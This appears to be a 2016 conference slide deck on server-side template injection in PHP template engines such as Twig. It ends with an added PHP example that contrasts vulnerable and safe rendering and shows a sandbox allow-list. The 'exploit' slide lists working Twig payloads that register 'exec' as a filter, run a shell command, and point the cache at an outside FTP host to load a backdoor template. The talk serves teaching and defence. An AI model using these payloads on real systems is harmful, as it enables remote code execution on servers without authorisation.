Security of Web Framework Templates (SSTI)
Ömer Çıtak
Özgür Web Teknolojileri Günleri 2016 - www.ozgurwebgunleri.org.tr
www.omercitak.com
whoami
Security Researcher @ Netsparker Ltd.
Developer @ in whatever time is left
Writer @ Ethical Hacking “Offensive & Defensive” Book
Blog: omercitak.com
All Social Platform: @Om3rCitak
questions
1. Asp.net or PHP?
2. Asp or Laravel?
3. Laravel or Smarty?
4. Smarty or Asp?
why using framework?
● Spaghetti Code (functions.php) :P
● Enforcing Coding Standards
● Pretty URLs
● More code in less time
● MVC or other models
what is the MVC?
what is the VIEW layer?
Template Engines;
● Twig
● Smarty
● Blade
● Volt
● Mustache
● etc...
twig
● registerUndefinedFilterCallback("function_name")
● getFilter("filter")
● setCache("ftp://omercitak.com:21")
● loadTemplate("backdoor")
exploit
● {{_self.env.registerUndefinedFilterCallback("exec")}}
● {{_self.env.getFilter("ls")}}
● {{_self.env.setCache("ftp://omercitak.com:21")}}
● {{_self.env.loadTemplate("backdoor")}}
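The payloads above only fire when user input reaches Twig as template source rather than as template data. The following is an added example, not part of the talk or of Twig itself: it puts the vulnerable sink next to its fix and shows the sandbox as defence in depth. It assumes Twig 2/3 namespaced class names installed via Composer (vendor/autoload.php); the template names, the greeting template and the probe string are constructed for the demo.

```php
<?php
// Added example (not from the talk). Assumes: composer require twig/twig,
// Twig 2/3 namespaced classes, autoloader at vendor/autoload.php.
require __DIR__ . '/vendor/autoload.php';

use Twig\Environment;
use Twig\Loader\ArrayLoader;
use Twig\Extension\SandboxExtension;
use Twig\Sandbox\SecurityPolicy;
use Twig\Sandbox\SecurityError;

// Constructed sample input: a harmless expression that is evaluated only if the
// input is parsed as template code. The _self.env.* payloads on the slide above
// reach the same code path.
$userInput = '{{ 7 * 7 }}';

// VULNERABLE: user input is concatenated into the template *source*.
// Twig compiles and evaluates it with the privileges of the application.
function renderVulnerable(Environment $twig, string $input): string
{
    return $twig->createTemplate('Hello ' . $input)->render();
}

// SAFE: the template is fixed at development time; user input is passed as
// *data* in the context and printed (auto-escaped) as an opaque string.
function renderSafe(Environment $twig, string $input): string
{
    return $twig->render('greeting', ['name' => $input]);
}

$loader = new ArrayLoader(['greeting' => 'Hello {{ name }}']);
$twig   = new Environment($loader, ['autoescape' => 'html']);

echo renderVulnerable($twig, $userInput), PHP_EOL; // Hello 49        (evaluated)
echo renderSafe($twig, $userInput), PHP_EOL;       // Hello {{ 7 * 7 }} (literal)

// DEFENCE IN DEPTH: if end users legitimately author templates (e-mail or
// report templates), render them under the sandbox with an allow-list.
// Anything outside the policy, here the "join" filter, aborts with a
// SecurityError instead of executing.
$policy = new SecurityPolicy(
    ['if', 'for'],                 // allowed tags
    ['escape', 'upper', 'lower'],  // allowed filters
    [],                            // allowed methods: none, so no method calls on objects
    [],                            // allowed properties
    ['range']                      // allowed functions
);
$sandboxed = new Environment(new ArrayLoader([]), ['autoescape' => 'html']);
$sandboxed->addExtension(new SandboxExtension($policy, true)); // true = sandbox every template

try {
    echo $sandboxed->createTemplate('{{ items|join(",") }}')->render(['items' => ['a', 'b']]);
} catch (SecurityError $e) {
    echo 'blocked by sandbox: ', get_class($e), PHP_EOL;
}
```

The rule the example illustrates: template source must be developer-controlled; user data goes into the render context. The sandbox is a second layer for cases where that rule cannot hold, not a substitute for it.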
demo
questions
thanks
www.omercitak.com
All Social Platform: @Om3rCitak